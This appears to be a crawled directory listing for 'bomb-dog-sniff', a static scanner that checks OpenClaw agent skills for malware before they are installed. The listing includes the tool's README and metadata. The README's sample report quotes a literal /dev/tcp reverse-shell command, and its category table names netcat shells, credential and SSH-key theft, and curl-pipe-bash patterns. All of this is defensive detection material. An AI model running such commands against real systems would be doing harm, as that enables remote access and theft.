Crawler Summary

bomb-dog-sniff answer-first brief

Security-first skill management for OpenClaw - like a bomb-sniffing dog for skills. Sniffs out malicious payloads (crypto stealers, keyloggers, reverse shells) before installation. Quarantine โ†’ Scan โ†’ Install only the safe ones. --- name: bomb-dog-sniff version: 1.2.0 description: | Security-first skill management for OpenClaw - like a bomb-sniffing dog for skills. Sniffs out malicious payloads (crypto stealers, keyloggers, reverse shells) before installation. Quarantine โ†’ Scan โ†’ Install only the safe ones. author: OpenClaw Security Team homepage: https://github.com/openclaw/skills/bomb-dog-sniff --- bomb-dog-sniff v1.2.0 ๐Ÿ• **Like a bomb-sn Capability contract not published. No trust telemetry is available yet. 1 GitHub stars reported by the source. Last updated 2/25/2026.

Freshness

Last checked 2/25/2026

Best For

bomb-dog-sniff is best for multiple, scan, summary workflows where OpenClaw compatibility matters.

Not Ideal For

Contract metadata is missing or unavailable for deterministic execution.

Evidence Sources Checked

editorial-content, GITHUB OPENCLEW, runtime-metrics, public facts pack

Claim this agent
Agent DossierGitHubSafety: 89/100

bomb-dog-sniff

Security-first skill management for OpenClaw - like a bomb-sniffing dog for skills. Sniffs out malicious payloads (crypto stealers, keyloggers, reverse shells) before installation. Quarantine โ†’ Scan โ†’ Install only the safe ones. --- name: bomb-dog-sniff version: 1.2.0 description: | Security-first skill management for OpenClaw - like a bomb-sniffing dog for skills. Sniffs out malicious payloads (crypto stealers, keyloggers, reverse shells) before installation. Quarantine โ†’ Scan โ†’ Install only the safe ones. author: OpenClaw Security Team homepage: https://github.com/openclaw/skills/bomb-dog-sniff --- bomb-dog-sniff v1.2.0 ๐Ÿ• **Like a bomb-sn

OpenClawself-declared

Public facts

5

Change events

1

Artifacts

0

Freshness

Feb 25, 2026

Verifiededitorial-contentNo verified compatibility signals1 GitHub stars

Capability contract not published. No trust telemetry is available yet. 1 GitHub stars reported by the source. Last updated 2/25/2026.

1 GitHub starsTrust evidence available

Trust score

Unknown

Compatibility

OpenClaw

Freshness

Feb 25, 2026

Vendor

Openclaw

Artifacts

0

Benchmarks

0

Last release

Unpublished

Executive Summary

Key links, install path, and a quick operational read before the deeper crawl record.

Verifiededitorial-content

Summary

Capability contract not published. No trust telemetry is available yet. 1 GitHub stars reported by the source. Last updated 2/25/2026.

Setup snapshot

git clone https://github.com/LvcidPsyche/skill-bomb-dog-sniff.git
  1. 1

    Setup complexity is LOW. This package is likely designed for quick installation with minimal external side-effects.

  2. 2

    Final validation: Expose the agent to a mock request payload inside a sandbox and trace the network egress before allowing access to real customer data.

Evidence Ledger

Everything public we have scraped or crawled about this agent, grouped by evidence type with provenance.

Verifiededitorial-content
Vendor (1)

Vendor

Openclaw

profilemedium
Observed Feb 25, 2026Source linkProvenance
Compatibility (1)

Protocol compatibility

OpenClaw

contractmedium
Observed Feb 25, 2026Source linkProvenance
Adoption (1)

Adoption signal

1 GitHub stars

profilemedium
Observed Feb 25, 2026Source linkProvenance
Security (1)

Handshake status

UNKNOWN

trustmedium
Observed unknownSource linkProvenance
Integration (1)

Crawlable docs

6 indexed pages on the official domain

search_documentmedium
Observed Apr 15, 2026Source linkProvenance

Release & Crawl Timeline

Merged public release, docs, artifact, benchmark, pricing, and trust refresh events.

Self-declaredagent-index

Artifacts Archive

Extracted files, examples, snippets, parameters, dependencies, permissions, and artifact metadata.

Self-declaredGITHUB OPENCLEW

Extracted files

0

Examples

6

Snippets

0

Languages

typescript

Parameters

Executable Examples

bash

# Sniff out threats before installing
openclaw skill bomb-dog-sniff scan ./downloaded-skill

# Safe install from clawhub (auto-downloads, sniffs, installs if clean)
openclaw skill bomb-dog-sniff safe-install cool-skill

# Audit an already-installed skill
openclaw skill bomb-dog-sniff audit bird

# Batch scan multiple skills
openclaw skill bomb-dog-sniff batch skills-to-audit.txt

bash

openclaw skill bomb-dog-sniff scan <path> [options]

Options:
  -j, --json          Output JSON only
  -v, --verbose       Show detailed findings
  -t, --threshold N   Set risk threshold (default: 40)
  -h, --help          Show help

bash

openclaw skill bomb-dog-sniff scan ./untrusted-skill
openclaw skill bomb-dog-sniff scan -j ./untrusted-skill > report.json

text

๐Ÿ” Bomb-Dog-Sniff Security Scanner v1.2.0
Target: /home/user/skills/untrusted-skill

๐Ÿ”ด CRITICAL (2)
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  crypto_harvester: scripts/wallet.js:23
    Crypto wallet private key harvesting detected
    Code: const privateKey = "a1b2c3..."
    Confidence: high

  reverse_shell: scripts/backdoor.sh:5
    Reverse shell or remote code execution detected
    Code: bash -i >& /dev/tcp/192.168.1.100/4444
    Confidence: high

๐ŸŸ  HIGH (1)
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  pipe_bash: install.sh:12
    Dangerous curl | bash pattern detected
    Confidence: high

โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
SCAN SUMMARY
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
โ˜ ๏ธ Risk Score: 75/100
   Risk Level: MALICIOUS
   Duration: 125ms
   Files Scanned: 12/15
   Files Skipped: 3 (binary/empty/large)
   Findings: 3

   Severity Breakdown:
     ๐Ÿ”ด CRITICAL: 2
     ๐ŸŸ  HIGH: 1

๐Ÿ“‹ Recommendation:
   MALICIOUS - Do not install. Found 3 critical security issues.

Scan ID: bds-20260208-a1b2c3d4

bash

openclaw skill bomb-dog-sniff safe-install <source> [options]

Source:
  - ClawHub skill name: bird
  - GitHub URL: https://github.com/user/skill
  - Local path: ./local-skill

Options:
  --threshold N   Set risk threshold (default: 39)
  --dry-run       Scan only, don't install
  --verbose       Show all findings

bash

# Install with default threshold (39)
openclaw skill bomb-dog-sniff safe-install bird

# Stricter threshold
openclaw skill bomb-dog-sniff safe-install cool-skill --threshold 20

# Scan only (dry run)
openclaw skill bomb-dog-sniff safe-install unknown-skill --dry-run

# GitHub source
openclaw skill bomb-dog-sniff safe-install https://github.com/user/cool-skill

Docs & README

Full documentation captured from public sources, including the complete README when available.

Self-declaredGITHUB OPENCLEW

Docs source

GITHUB OPENCLEW

Editorial quality

ready

Security-first skill management for OpenClaw - like a bomb-sniffing dog for skills. Sniffs out malicious payloads (crypto stealers, keyloggers, reverse shells) before installation. Quarantine โ†’ Scan โ†’ Install only the safe ones. --- name: bomb-dog-sniff version: 1.2.0 description: | Security-first skill management for OpenClaw - like a bomb-sniffing dog for skills. Sniffs out malicious payloads (crypto stealers, keyloggers, reverse shells) before installation. Quarantine โ†’ Scan โ†’ Install only the safe ones. author: OpenClaw Security Team homepage: https://github.com/openclaw/skills/bomb-dog-sniff --- bomb-dog-sniff v1.2.0 ๐Ÿ• **Like a bomb-sn

Full README

name: bomb-dog-sniff version: 1.2.0 description: | Security-first skill management for OpenClaw - like a bomb-sniffing dog for skills. Sniffs out malicious payloads (crypto stealers, keyloggers, reverse shells) before installation. Quarantine โ†’ Scan โ†’ Install only the safe ones. author: OpenClaw Security Team homepage: https://github.com/openclaw/skills/bomb-dog-sniff

bomb-dog-sniff v1.2.0 ๐Ÿ•

Like a bomb-sniffing dog for OpenClaw skills

Sniff out malicious skills before they explode in your system. Quarantine โ†’ Scan โ†’ Install only the safe ones.

What's New in v1.2.0

Security Hardening

  • Fixed command injection vulnerabilities in download functions
  • Added path traversal protection - Sanitizes all path inputs
  • Secure quarantine - Randomized directory names with restricted permissions
  • Binary file detection - Skips binary files to avoid false positives
  • File size limits - Prevents DoS via huge files
  • ReDoS protection - Limits regex processing on long lines

Detection Improvements

  • Smart false positive reduction - Better context-aware pattern matching
  • Entropy analysis - Detects encoded/encrypted payloads
  • Test file awareness - Reduces severity for findings in test files
  • Confidence scoring - Each finding has confidence level (high/medium/low)
  • 13 detection categories - Added supply chain, prototype pollution, and malicious script detection

New Patterns

  • Supply chain attack indicators (typosquatting, dynamic requires)
  • Prototype pollution vulnerabilities
  • Malicious npm/yarn scripts
  • Browser credential theft
  • SSH key theft
  • Systemd persistence mechanisms

Quick Start

# Sniff out threats before installing
openclaw skill bomb-dog-sniff scan ./downloaded-skill

# Safe install from clawhub (auto-downloads, sniffs, installs if clean)
openclaw skill bomb-dog-sniff safe-install cool-skill

# Audit an already-installed skill
openclaw skill bomb-dog-sniff audit bird

# Batch scan multiple skills
openclaw skill bomb-dog-sniff batch skills-to-audit.txt

Commands

scan

Scan a skill directory for malicious patterns.

openclaw skill bomb-dog-sniff scan <path> [options]

Options:
  -j, --json          Output JSON only
  -v, --verbose       Show detailed findings
  -t, --threshold N   Set risk threshold (default: 40)
  -h, --help          Show help

Example:

openclaw skill bomb-dog-sniff scan ./untrusted-skill
openclaw skill bomb-dog-sniff scan -j ./untrusted-skill > report.json

Output:

๐Ÿ” Bomb-Dog-Sniff Security Scanner v1.2.0
Target: /home/user/skills/untrusted-skill

๐Ÿ”ด CRITICAL (2)
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  crypto_harvester: scripts/wallet.js:23
    Crypto wallet private key harvesting detected
    Code: const privateKey = "a1b2c3..."
    Confidence: high

  reverse_shell: scripts/backdoor.sh:5
    Reverse shell or remote code execution detected
    Code: bash -i >& /dev/tcp/192.168.1.100/4444
    Confidence: high

๐ŸŸ  HIGH (1)
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  pipe_bash: install.sh:12
    Dangerous curl | bash pattern detected
    Confidence: high

โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
SCAN SUMMARY
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
โ˜ ๏ธ Risk Score: 75/100
   Risk Level: MALICIOUS
   Duration: 125ms
   Files Scanned: 12/15
   Files Skipped: 3 (binary/empty/large)
   Findings: 3

   Severity Breakdown:
     ๐Ÿ”ด CRITICAL: 2
     ๐ŸŸ  HIGH: 1

๐Ÿ“‹ Recommendation:
   MALICIOUS - Do not install. Found 3 critical security issues.

Scan ID: bds-20260208-a1b2c3d4

safe-install

Download from clawhub/GitHub, scan, and install only if safe.

openclaw skill bomb-dog-sniff safe-install <source> [options]

Source:
  - ClawHub skill name: bird
  - GitHub URL: https://github.com/user/skill
  - Local path: ./local-skill

Options:
  --threshold N   Set risk threshold (default: 39)
  --dry-run       Scan only, don't install
  --verbose       Show all findings

Example:

# Install with default threshold (39)
openclaw skill bomb-dog-sniff safe-install bird

# Stricter threshold
openclaw skill bomb-dog-sniff safe-install cool-skill --threshold 20

# Scan only (dry run)
openclaw skill bomb-dog-sniff safe-install unknown-skill --dry-run

# GitHub source
openclaw skill bomb-dog-sniff safe-install https://github.com/user/cool-skill

audit

Audit an already-installed skill.

openclaw skill bomb-dog-sniff audit <skill-name> [options]

Example:

openclaw skill bomb-dog-sniff audit notion

batch

Scan multiple skills from a list file.

openclaw skill bomb-dog-sniff batch <list-file>

Example list file (skills.txt):

# My installed skills to audit
bird
notion
gog
slack
./custom-skill

# Commented lines are ignored
# old-skill

Run:

openclaw skill bomb-dog-sniff batch skills.txt

Detection Categories

bomb-dog-sniff scans for these threat categories:

| Category | Severity | Examples Detected | |----------|----------|-------------------| | crypto_harvester | CRITICAL | Private key extraction, wallet exports, mnemonic theft | | credential_theft | CRITICAL | Environment variable exfiltration, config file theft, SSH key theft | | reverse_shell | CRITICAL | Netcat shells, /dev/tcp/ redirects, socket-based shells, eval of remote code | | keylogger | CRITICAL | Keyboard capture with exfiltration, clipboard theft, password field monitoring | | encoded_payload | HIGH | Base64 execution chains, hex escapes with eval context, obfuscated code | | suspicious_api | HIGH | Pastebin/ngrok/webhook destinations, dynamic URL construction with secrets | | pipe_bash | HIGH | curl \| bash, wget \| sh patterns | | deposit_scam | HIGH | "Send ETH to 0x...", payment prompts in unexpected contexts | | supply_chain | HIGH | Typosquatting, dynamic requires, suspicious postinstall scripts | | prototype_pollution | HIGH | Dangerous object merging, __proto__ manipulation | | malicious_script | CRITICAL | Pre/postinstall doing network/exec operations, modifying other packages | | network_exfil | MEDIUM | File reading followed by network transmission | | file_tamper | CRITICAL | .bashrc modification, crontab editing, SSH authorized_keys manipulation |

Risk Scoring

0-19   SAFE        โœ… Install freely
20-39  LOW         โš ๏ธ  Review recommended
40-69  SUSPICIOUS  ๐Ÿšซ Blocked by default
70-100 MALICIOUS   โ˜ ๏ธ  Never install

Each finding adds to the score:

  • CRITICAL: +25 points (ร— confidence multiplier)
  • HIGH: +15 points (ร— confidence multiplier)
  • MEDIUM: +5 points (ร— confidence multiplier)

Confidence multipliers:

  • High confidence: 1.0ร—
  • Medium confidence: 0.75ร—
  • Low confidence: 0.5ร—

Score caps at 100.

How It Works

Safe Install Process

1. QUARANTINE
   โ””โ”€โ”€ Skill downloaded to /tmp/bds-q-<random>/
   โ””โ”€โ”€ Randomized, non-predictable directory name
   โ””โ”€โ”€ Restricted permissions (0o700)
   
2. SCAN
   โ”œโ”€โ”€ Check all files against detection patterns
   โ”œโ”€โ”€ Skip binary files, empty files, files >10MB
   โ”œโ”€โ”€ Calculate entropy for encoded payload detection
   โ”œโ”€โ”€ Apply confidence multipliers
   โ””โ”€โ”€ Generate findings report
   
3. DECISION
   โ”œโ”€โ”€ Risk > threshold? โ†’ BLOCK & DELETE
   โ””โ”€โ”€ Risk โ‰ค threshold? โ†’ PROCEED
   
4. INSTALL (if passed)
   โ””โ”€โ”€ Move from quarantine to skills directory
   โ””โ”€โ”€ Backup existing installation (max 5 backups)
   
5. CLEANUP
   โ””โ”€โ”€ Securely remove quarantine directory

Scanning Details

  • Static analysis only - No code execution
  • Multi-pattern matching - 60+ detection patterns
  • Line-level reporting - Exact file:line for each finding
  • False positive reduction - Context-aware pattern matching
  • Binary detection - Automatically skips binary files
  • Symlink loop protection - Tracks visited inodes
  • Depth limiting - Max 20 directory levels
  • Test file handling - Reduces severity for test files

Configuration

Environment Variables

# Set custom skills directory
export OPENCLAW_SKILLS_DIR=/path/to/skills

# Set default risk threshold
export BOMB_DOG_THRESHOLD=25

Per-Skill Configuration

Add to your skill's package.json:

{
  "bomb-dog-sniff": {
    "riskThreshold": 25,
    "excludedCategories": ["network_exfil"]
  }
}

CI/CD Integration

Add to your CI pipeline:

# .github/workflows/skill-security.yml
name: Skill Security Scan

on: [push, pull_request]

jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      
      - name: Scan skills
        run: |
          for skill in skills/*/; do
            echo "Scanning $skill"
            node skills/bomb-dog-sniff/scan.js "$skill" || exit 1
          done

Exit codes:

  • 0 - Safe (score below threshold)
  • 1 - Error/invalid arguments
  • 2 - Risky (score โ‰ฅ threshold)

Programmatic API

const { scanSkill } = require('./scan');
const { safeDownload } = require('./safe-download');

// Scan a skill
const report = scanSkill('./path/to/skill', { verbose: true });
console.log(`Risk score: ${report.riskScore}`);
console.log(`Findings: ${report.findings.length}`);

// Safe download and install
const result = await safeDownload('cool-skill', {
  autoInstall: true,
  riskThreshold: 30,
});

if (!result.success) {
  console.error('Installation blocked:', result.reason);
}

Security Limits

To prevent DoS and ensure scanner security:

| Limit | Value | Purpose | |-------|-------|---------| | Max file size | 10MB | Prevent memory exhaustion | | Max line length | 10KB | Prevent ReDoS attacks | | Max files per scan | 10,000 | Prevent resource exhaustion | | Max findings per file | 100 | Prevent output flooding | | Max total findings | 500 | Prevent result flooding | | Max directory depth | 20 | Prevent infinite recursion | | Download timeout | 2 minutes | Prevent hanging downloads | | Max download size | 50MB | Prevent disk exhaustion |

False Positives

If legitimate code triggers a warning:

  1. Check confidence level - Low confidence findings are more likely to be false positives
  2. Review the excerpt - Look at the actual code flagged
  3. Test files are noted - Findings in *.test.js or __tests__/ have reduced severity
  4. Comments are generally skipped - Unless they contain suspicious keywords

To report false positives, please include:

  • The file content that triggered the false positive
  • The pattern category that matched
  • Expected behavior

Best Practices

  1. Always scan before installing unknown skills
  2. Use --dry-run first for untrusted sources
  3. Set lower threshold (--threshold 20) for critical systems
  4. Audit regularly - Rescan installed skills periodically
  5. Review CRITICAL findings - Never ignore critical severity warnings
  6. Check confidence levels - High confidence = higher priority

Files

  • SKILL.md - This documentation
  • scan.js - Core scanner engine
  • patterns.js - Detection pattern definitions
  • safe-download.js - Safe download & install logic
  • scripts/sniff.sh - CLI wrapper
  • package.json - Package configuration
  • QUICKSTART.md - Quick reference guide

Security Notes

โš ๏ธ Limitations:

  • Static analysis only (some obfuscation may evade detection)
  • Pattern-based (novel attacks may not be detected)
  • Not a replacement for manual code review on critical systems
  • Cannot detect runtime-only malicious behavior

โœ… Recommendations:

  • Use bomb-dog-sniff as first line of defense
  • Review code manually for high-security environments
  • Keep patterns.js updated with new threat signatures
  • Report false positives and missed detections
  • Combine with other security tools for defense in depth

Changelog

v1.2.0 (Hardened Edition)

  • SECURITY: Fixed command injection vulnerabilities in safe-download.js
  • SECURITY: Added path traversal protection
  • SECURITY: Secure randomized quarantine directories
  • FEATURE: Binary file detection and skipping
  • FEATURE: File size limits (10MB per file, 50MB download)
  • FEATURE: Entropy analysis for encoded payload detection
  • FEATURE: Confidence scoring for all findings
  • FEATURE: Test file awareness with severity reduction
  • FEATURE: 3 new detection categories (supply_chain, prototype_pollution, malicious_script)
  • IMPROVEMENT: Better false positive reduction with context-aware matching
  • IMPROVEMENT: ReDoS protection via line length limits
  • IMPROVEMENT: Symlink loop protection
  • IMPROVEMENT: Backup rotation (max 5 backups)

v1.1.0

  • Added safe-install command with quarantine workflow
  • Added audit command for installed skills
  • Added batch command for multiple skill scanning
  • Enhanced detection patterns (50+ signatures)
  • Added risk threshold configuration

v1.0.0

  • Initial release with basic scanning
  • 10 detection categories
  • JSON output format

License

MIT - See LICENSE file


Stay safe. Scan everything. Trust verified skills only. ๐Ÿฆž๐Ÿ•

Contract & API

Machine endpoints, protocol fit, contract coverage, invocation examples, and guardrails for agent-to-agent use.

MissingGITHUB OPENCLEW

Contract coverage

Status

missing

Auth

None

Streaming

No

Data region

Unspecified

Protocol support

OpenClaw: self-declared

Requires: none

Forbidden: none

Guardrails

Operational confidence: low

No positive guardrails captured.
Invocation examples
curl -s "https://xpersona.co/api/v1/agents/lvcidpsyche-skill-bomb-dog-sniff/snapshot"
curl -s "https://xpersona.co/api/v1/agents/lvcidpsyche-skill-bomb-dog-sniff/contract"
curl -s "https://xpersona.co/api/v1/agents/lvcidpsyche-skill-bomb-dog-sniff/trust"

Reliability & Benchmarks

Trust and runtime signals, benchmark suites, failure patterns, and practical risk constraints.

Missingruntime-metrics

Trust signals

Handshake

UNKNOWN

Confidence

unknown

Attempts 30d

unknown

Fallback rate

unknown

Runtime metrics

Observed P50

unknown

Observed P95

unknown

Rate limit

unknown

Estimated cost

unknown

Do not use if

Contract metadata is missing or unavailable for deterministic execution.
No benchmark suites or observed failure patterns are available.

Media & Demo

Every public screenshot, visual asset, demo link, and owner-provided destination tied to this agent.

Missingno-media
No screenshots, media assets, or demo links are available.

Related Agents

Neighboring agents from the same protocol and source ecosystem for comparison and shortlist building.

Self-declaredprotocol-neighbors
GITHUB_REPOSactivepieces

Rank

70

AI Agents & MCPs & AI Workflow Automation โ€ข (~400 MCP servers for AI agents) โ€ข AI Automation / AI Agent with MCPs โ€ข AI Workflows & AI Agents โ€ข MCPs for AI Agents

Traction

No public download signal

Freshness

Updated 2d ago

OPENCLAW
GITHUB_REPOScherry-studio

Rank

70

AI productivity studio with smart chat, autonomous agents, and 300+ assistants. Unified access to frontier LLMs

Traction

No public download signal

Freshness

Updated 6d ago

MCPOPENCLAW
GITHUB_REPOSAionUi

Rank

70

Free, local, open-source 24/7 Cowork app and OpenClaw for Gemini CLI, Claude Code, Codex, OpenCode, Qwen Code, Goose CLI, Auggie, and more | ๐ŸŒŸ Star if you like it!

Traction

No public download signal

Freshness

Updated 6d ago

MCPOPENCLAW
GITHUB_REPOSCopilotKit

Rank

70

The Frontend for Agents & Generative UI. React + Angular

Traction

No public download signal

Freshness

Updated 23d ago

OPENCLAW
Machine Appendix

Contract JSON

{
  "contractStatus": "missing",
  "authModes": [],
  "requires": [],
  "forbidden": [],
  "supportsMcp": false,
  "supportsA2a": false,
  "supportsStreaming": false,
  "inputSchemaRef": null,
  "outputSchemaRef": null,
  "dataRegion": null,
  "contractUpdatedAt": null,
  "sourceUpdatedAt": null,
  "freshnessSeconds": null
}

Invocation Guide

{
  "preferredApi": {
    "snapshotUrl": "https://xpersona.co/api/v1/agents/lvcidpsyche-skill-bomb-dog-sniff/snapshot",
    "contractUrl": "https://xpersona.co/api/v1/agents/lvcidpsyche-skill-bomb-dog-sniff/contract",
    "trustUrl": "https://xpersona.co/api/v1/agents/lvcidpsyche-skill-bomb-dog-sniff/trust"
  },
  "curlExamples": [
    "curl -s \"https://xpersona.co/api/v1/agents/lvcidpsyche-skill-bomb-dog-sniff/snapshot\"",
    "curl -s \"https://xpersona.co/api/v1/agents/lvcidpsyche-skill-bomb-dog-sniff/contract\"",
    "curl -s \"https://xpersona.co/api/v1/agents/lvcidpsyche-skill-bomb-dog-sniff/trust\""
  ],
  "jsonRequestTemplate": {
    "query": "summarize this repo",
    "constraints": {
      "maxLatencyMs": 2000,
      "protocolPreference": [
        "OPENCLEW"
      ]
    }
  },
  "jsonResponseTemplate": {
    "ok": true,
    "result": {
      "summary": "...",
      "confidence": 0.9
    },
    "meta": {
      "source": "GITHUB_OPENCLEW",
      "generatedAt": "2026-04-17T05:19:07.132Z"
    }
  },
  "retryPolicy": {
    "maxAttempts": 3,
    "backoffMs": [
      500,
      1500,
      3500
    ],
    "retryableConditions": [
      "HTTP_429",
      "HTTP_503",
      "NETWORK_TIMEOUT"
    ]
  }
}

Trust JSON

{
  "status": "unavailable",
  "handshakeStatus": "UNKNOWN",
  "verificationFreshnessHours": null,
  "reputationScore": null,
  "p95LatencyMs": null,
  "successRate30d": null,
  "fallbackRate": null,
  "attempts30d": null,
  "trustUpdatedAt": null,
  "trustConfidence": "unknown",
  "sourceUpdatedAt": null,
  "freshnessSeconds": null
}

Capability Matrix

{
  "rows": [
    {
      "key": "OPENCLEW",
      "type": "protocol",
      "support": "unknown",
      "confidenceSource": "profile",
      "notes": "Listed on profile"
    },
    {
      "key": "multiple",
      "type": "capability",
      "support": "supported",
      "confidenceSource": "profile",
      "notes": "Declared in agent profile metadata"
    },
    {
      "key": "scan",
      "type": "capability",
      "support": "supported",
      "confidenceSource": "profile",
      "notes": "Declared in agent profile metadata"
    },
    {
      "key": "summary",
      "type": "capability",
      "support": "supported",
      "confidenceSource": "profile",
      "notes": "Declared in agent profile metadata"
    },
    {
      "key": "id",
      "type": "capability",
      "support": "supported",
      "confidenceSource": "profile",
      "notes": "Declared in agent profile metadata"
    },
    {
      "key": "only",
      "type": "capability",
      "support": "supported",
      "confidenceSource": "profile",
      "notes": "Declared in agent profile metadata"
    },
    {
      "key": "on",
      "type": "capability",
      "support": "supported",
      "confidenceSource": "profile",
      "notes": "Declared in agent profile metadata"
    },
    {
      "key": "skills",
      "type": "capability",
      "support": "supported",
      "confidenceSource": "profile",
      "notes": "Declared in agent profile metadata"
    },
    {
      "key": "a",
      "type": "capability",
      "support": "supported",
      "confidenceSource": "profile",
      "notes": "Declared in agent profile metadata"
    },
    {
      "key": "before",
      "type": "capability",
      "support": "supported",
      "confidenceSource": "profile",
      "notes": "Declared in agent profile metadata"
    },
    {
      "key": "installed",
      "type": "capability",
      "support": "supported",
      "confidenceSource": "profile",
      "notes": "Declared in agent profile metadata"
    },
    {
      "key": "everything",
      "type": "capability",
      "support": "supported",
      "confidenceSource": "profile",
      "notes": "Declared in agent profile metadata"
    }
  ],
  "flattenedTokens": "protocol:OPENCLEW|unknown|profile capability:multiple|supported|profile capability:scan|supported|profile capability:summary|supported|profile capability:id|supported|profile capability:only|supported|profile capability:on|supported|profile capability:skills|supported|profile capability:a|supported|profile capability:before|supported|profile capability:installed|supported|profile capability:everything|supported|profile"
}

Facts JSON

[
  {
    "factKey": "docs_crawl",
    "category": "integration",
    "label": "Crawlable docs",
    "value": "6 indexed pages on the official domain",
    "href": "https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fopenclaw%2Fskills%2Ftree%2Fmain%2Fskills%2Fasleep123%2Fcaldav-calendar",
    "sourceUrl": "https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fopenclaw%2Fskills%2Ftree%2Fmain%2Fskills%2Fasleep123%2Fcaldav-calendar",
    "sourceType": "search_document",
    "confidence": "medium",
    "observedAt": "2026-04-15T05:03:46.393Z",
    "isPublic": true
  },
  {
    "factKey": "vendor",
    "category": "vendor",
    "label": "Vendor",
    "value": "Openclaw",
    "href": "https://github.com/openclaw/skills/bomb-dog-sniff",
    "sourceUrl": "https://github.com/openclaw/skills/bomb-dog-sniff",
    "sourceType": "profile",
    "confidence": "medium",
    "observedAt": "2026-02-25T02:25:17.321Z",
    "isPublic": true
  },
  {
    "factKey": "protocols",
    "category": "compatibility",
    "label": "Protocol compatibility",
    "value": "OpenClaw",
    "href": "https://xpersona.co/api/v1/agents/lvcidpsyche-skill-bomb-dog-sniff/contract",
    "sourceUrl": "https://xpersona.co/api/v1/agents/lvcidpsyche-skill-bomb-dog-sniff/contract",
    "sourceType": "contract",
    "confidence": "medium",
    "observedAt": "2026-02-25T02:25:17.321Z",
    "isPublic": true
  },
  {
    "factKey": "traction",
    "category": "adoption",
    "label": "Adoption signal",
    "value": "1 GitHub stars",
    "href": "https://github.com/LvcidPsyche/skill-bomb-dog-sniff",
    "sourceUrl": "https://github.com/LvcidPsyche/skill-bomb-dog-sniff",
    "sourceType": "profile",
    "confidence": "medium",
    "observedAt": "2026-02-25T02:25:17.321Z",
    "isPublic": true
  },
  {
    "factKey": "handshake_status",
    "category": "security",
    "label": "Handshake status",
    "value": "UNKNOWN",
    "href": "https://xpersona.co/api/v1/agents/lvcidpsyche-skill-bomb-dog-sniff/trust",
    "sourceUrl": "https://xpersona.co/api/v1/agents/lvcidpsyche-skill-bomb-dog-sniff/trust",
    "sourceType": "trust",
    "confidence": "medium",
    "observedAt": null,
    "isPublic": true
  }
]

Change Events JSON

[
  {
    "eventType": "docs_update",
    "title": "Docs refreshed: Sign in to GitHub ยท GitHub",
    "description": "Fresh crawlable documentation was indexed for the official domain.",
    "href": "https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fopenclaw%2Fskills%2Ftree%2Fmain%2Fskills%2Fasleep123%2Fcaldav-calendar",
    "sourceUrl": "https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fopenclaw%2Fskills%2Ftree%2Fmain%2Fskills%2Fasleep123%2Fcaldav-calendar",
    "sourceType": "search_document",
    "confidence": "medium",
    "observedAt": "2026-04-15T05:03:46.393Z",
    "isPublic": true
  }
]

Sponsored

Ads related to bomb-dog-sniff and adjacent AI workflows.